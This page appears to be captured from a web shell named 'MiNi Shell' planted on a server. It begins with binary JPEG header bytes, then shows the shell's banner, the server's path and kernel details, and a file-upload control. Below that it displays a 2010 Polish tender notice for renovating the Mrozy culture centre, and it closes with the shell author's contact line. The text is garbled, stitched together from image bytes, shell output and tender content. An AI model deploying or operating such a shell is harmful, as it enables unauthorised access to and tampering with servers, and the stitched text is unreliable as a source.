JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100114/10031-N-2010.html

<p class="kh_header"><b>Mrozy: Remont i wyposażenie budynku Gminnego Centrum Kultury w Mrozach</b><br>
<b>Numer ogłoszenia: 10031 - 2010; data zamieszczenia: 14.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminne Centrum Kultury im. Heleny Wielobyckiej , ul. Mickiewicza 22, 05-320 Mrozy, woj. mazowieckie, tel. 25 75 74 479, faks 25 75 74 479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mrozy.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Placówka kulturalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont i wyposażenie budynku Gminnego Centrum Kultury w Mrozach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A) remont ścian, sufitów i posadzek we wszystkich pomieszczeniach a w szczególności:
   - demontaż istniejącej boazerii drewnianej i z paneli drewnopodobnych i PCV,
   - zamurowanie otworów okiennych i drzwiowych, wykonanie nowych ścianek działowych wg przedstawionej aranżacji wnętrz, z cegły ceramicznej na zaprawie cementowo - wapiennej,
   - naprawa istniejących tynków, odkucie odstających i spękanych, zeskrobanie istniejącej farby,
   - wykonanie gładzi gipsowej na tynkach tradycyjnych,
   - malowanie farbami emulsyjnymi o dużej odporności na ścieranie i niezmywalnymi,
   -  wykonanie w korytarzu stropu z płyt gipsowo - kartonowych na ruszcie stalowym.

             Wykonanie remontu podłóg w wybranych pomieszczeniach - wg pozycji na rysunkach i w przedmiarach robót, a w szczególności:
   - skucie istniejących posadzek z płytek gresu oraz posadzek cementowych, rozebranie podłóg drewnianych, skucie nierówności podłoża, 
   - położenie warstwy wyrównującej z betonu, 
   - wykonanie warstwy izolacji przeciwwilgociowej z papy termozgrzewalnej lub gruntu dyspersyjnego [ folia w płynie itp],
    - wykonanie podkładu z betonu , ukształtowanie spadku pod rampę w korytarzu,
   - przebudowa schodów żelbetowych do garderoby.
    - położenie płytek gresowych  na zaprawie klejowej w kilku kolorach, na ścianach wykonać cokolik z płytek gresowych wys. 10 cm.
b) wymiana stolarki drzwiowej - drewnianej z ościeżnicami drewnianym, płytowych z ościeżnicami stalowymi - na drzwi z profili z kształtowników aluminiowych oraz z płyt MDF laminowanych, o wymiarach i w ilości wg zestawienia.  Wyposażenie drzwi: zamki z wkładką bębenkową, wzmocnione klamki. Do Sali widowiskowej zastosować drzwi o izolacyjności akustycznej większej 49 dB.
     Do produkcji drzwi zastosować.	
- profil aluminiowy , w kolorze brązowym,
- w drzwiach zastosować szyby bezpieczne P2, panel pełny o izolacyjności cieplnej Umax mniejsze niż 2,0 W przez m2K. 
- szerokość profili skrzydeł i ram co najmniej 60 mm.
  Drzwi drewniane - ościeżnice i skrzydła drzwiowe - typowe wg katalogu producentów wykonane z płyty MDF pełnej w okleinie laminowanej, wzmocnione zawiasy - pasowe - 3 szt, i klamki.
  Zastosowano drzwi typowe o szerokości skrzydła większej 80 cm , przy dwuskrzydłowych jedno skrzydło 90 cm.
  C) przebudowanie istniejących WC, z dostosowaniem dla potrzeb osób niepełnosprawnych, 
-   wymiana wewnętrznej instalacji i armatury sanitarnej,   
- położenie okładzin z glazurach na ścianach w łazienkach na wysokość 2,0 m.
  D) Remont i doposażenie Sali kinowej
  - wymiana istniejących foteli - fotele montowane w rzędzie ze wspólnym podłokietnikiem, przytwierdzone do podłogi, Tkanina standardowa - trudnozapalna,  
- dostarczenie i zamontowanie armatury nagłaśniającej i oświetleniowej wg wykazu w przedmiarze robót.
  E) wymiana wewnętrznej instalacji elektrycznej: oświetleniowej, gniazd wtykowych, grzejników elektrycznych, instalacji siłowej. Roboty wykonać na podstawie własnej dokumentacji wykonawczej. Zasilanie z istniejącej tablicy rozdzielczej.
  F) Wymiana wewnętrznej instalacji wodno - kanalizacyjnej.
 
        Szczegółowy zakres i ilość robót podany jest w przedmiarze robót wykonanym na podstawie projektu budowlanego, opisu, i katalogów 
         Przy wycenie robót oferent nie ma obowiązku stosowania powołanej w obmiarze robót podstawy wyceny. Jednak oferent musi wycenić wszystkie pozycje obmiaru. 
W wycenie należy ująć wszelkie koszty związane z zorganizowaniem i utrzymaniem zaplecza placu budowy w częściowo czynnym obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Każdy Wykonawca musi wnieść wadium w wysokości 15.000,00  zł. (słownie: piętnaście 
tysięcy złotych). 
 2. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
     2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo
         kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
     5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42, poz. 275)
 3. Wadium w formie pieniężnej należy wnieść na rachunek bankowy Zamawiającego: 66 9227 0004 0000 1557 2000 0210 prowadzony przez Bank Spółdzielczy w Mrozach z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
 4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielonego przez Polską Agencję Rozwoju Przedsiębiorczości, - w formie oryginału Wykonawca składa razem z ofertą. 
6. Wadium należy wnieść do dnia 04.02.2010r do godziny 11:00 
7.  Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez  Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
8. Wadium musi być wniesione przed upływem terminu składania ofert.
9. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na  
     rachunku bankowym Zamawiającego.
 10. Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
 11. Zamawiający zwróci niezwłocznie wadium, jeżeli:
       1) upłynął termin związania ofertą,
  2) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego 
      wykonania tej umowy,
3) Zamawiający unieważnił postępowania o udzielenie niniejszego zamówienia publicznego, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
 12. Z zastrzeżeniem art. 46 ust. 4a ustawy, Zamawiający niezwłocznie dokona zwrotu wadium na
       wniosek Wykonawcy:
    1) który wycofał ofertę  przed upływem terminu składania ofert,
    2) który został wykluczony z postępowania,
    3) którego oferta została odrzucona.
 13. W zakresie wadium obowiązują uregulowania ustawy zawarte w art. 45 i  46.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy:
1.1  Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
       ustawy nakładają obowiązek posiadania takich uprawnień.
1.2  Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
osobami zdolnymi do wykonania zamówienia lub którzy przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
1.3  Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

2. Z ubiegania się o zamówienia publicznego wyklucza się Wykonawców, którzy:
2.1  Nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ustawy   
2.2  Podlegają  wykluczeniu z postępowania na podstawie art. 24 ust. 1 ustawy.
2.3  Wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego  
postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w 
dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie 
utrudnia uczciwej konkurencji.
2.4  Złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania. 
2.5  Nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów 
potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy z 
zastrzeżeniem art. 26 ust. 3 ustawy.
2.6  Nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili 
              się na przedłużenie okresu związania ofertą. 

3. Zamawiający odrzuca ofertę jeżeli:
3.1  Jest niezgodna z ustawą.
3.2  Jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem 
       art. 87 ust. 2 pkt.3 ustawy.
3.3  Jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu 
       nieuczciwej konkurencji.
3.4  Zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia.  
3.5  Została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie
       zamówienia.
3.6  Zawiera błędy w obliczeniu ceny. 
3.7  Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na 
       poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt.3 ustawy. 
3.8  Jest nieważna na podstawie odrębnych przepisów.

4. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
5.  Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
     dokumenty, oświadczenia złożone przez Wykonawcę w niniejszym postępowaniu zgodnie z 
      formułą - spełnia - niespełna. 

7. Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta musi zawierać następujące oświadczenia i dokumenty Wykonawcy:

A. Na ofertę składają się następujące dokumenty i załączniki:
A.1) Formularz ofertowy - sporządzony według wzoru druku załączonego do SIWZ (zał. nr 1). 
A.2) Kosztorys ofertowy - sporządzony na podstawie załączonego do SIWZ (zał. nr 2) 
        przedmiaru robót zgodnie z rozdz. 10 pkt 1.5 SIWZ.

B. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
B.1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji
        działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub
        zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy
        przed upływem terminu składania ofert.  
B.2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego 
        oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
        Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem 
        podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
        że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
        płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
        nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
B.3) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie 
        właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
        określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
        upływem terminu składania ofert.  
B.4) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
         pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
B.5)  Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa 
         zamówień publicznych - sporządzony według wzoru druku załączonego do SIWZ (zał. nr 
         3)

C . W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej  
  wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
C.1)  Wykaz wykonanych robót budowlanych (sporządzony według wzoru załączonego do SIWZ
           - zał. nr 5) w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie. Wykonawca powinien wykazać, że wykonał należycie jedną robotę odpowiadającą swoim rodzajem robotom stanowiącym przedmiot zamówienia o wartości minimum 200 000,00 zł brutto. 
C.2)  Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z 
            informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia 
            niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich 
czynności oraz załączeniem dokumentów potwierdzających, że osoba  wskazana na kierownika budowy i kierownika robót branżowych  posiada wymagane uprawnienia  oraz aktualne zaświadczenie o przynależności tej osoby  do właściwego samorządu zawodowego - sporządzony według wzoru załączonego do SIWZ (zał. nr 6). Wykonawca dysponuje lub będzie dysponował co najmniej jednym kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej oraz posiadającym aktualne zaświadczenie o członkostwie w Okręgowej Izbie Inżynierów Budownictwa;
C.3) W przypadku gdy w wykazie opisanym w pkt C.2 Wykonawca wskazał osoby którymi będzie dysponował - obowiązany jest do wykazu dołączyć pisemne zobowiązanie  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

D.W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 
D.1)   Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest 
          ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na 
           kwotę 250.000,00 zł.
 
 
E. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:
E.1)  Zamiast dokumentów, o których mowa w pkt. B.1), B.2), B.4) składa dokument lub
         dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż    
     6  miesięcy przed upływem terminu składania ofert.
b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
     zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
     na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego
     organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania 
     ofert.
c)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie 
     wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
E.2)  Zamiast dokumentu, o którym mowa w pkt. B.3) składa zaświadczenie właściwego organu 
         sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której 
         dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawiony 
         nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert. 


Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. E zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w terminach określonych w niniejszym pkt. E.   

F. Dokumenty wymagane w przypadku składania oferty wspólnej: 
F.1  Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla         ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do         reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia         umowy - z tym, że pełnomocnictwo musi być złożone w formie oryginału lub kopii         potwierdzonej notarialnie. 

Oferta winna zawierać dokumenty opisane w punktach: B.1, B.2, B.3, B.4, E1, E 2, D.1 dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.   

H. Postanowienia dotyczące składanych dokumentów
H.1  Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii 
        potwierdzonych za zgodność przez Wykonawcę lub osobę - osoby uprawnione do  
        podpisania oferty z dopiskiem za zgodność z oryginałem.
H.2  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, 
        poświadczonym przez Wykonawcę
H.3. W przypadku kiedy Wykonawca ustanowił pełnomocnika pełnomocnictwo musi być 
        złożone w formie oryginału lub kopii potwierdzonej notarialnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mrozy.bip.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> GMINNE CENTRUM KULTURY W MROZACH, ul. A. Mickiewicza 22, 05-320 Mrozy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2010 godzina 11:00, miejsce: GMINNE CENTRUM KULTURY W MROZACH, ul. A. Mickiewicza 22, 05-320 Mrozy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com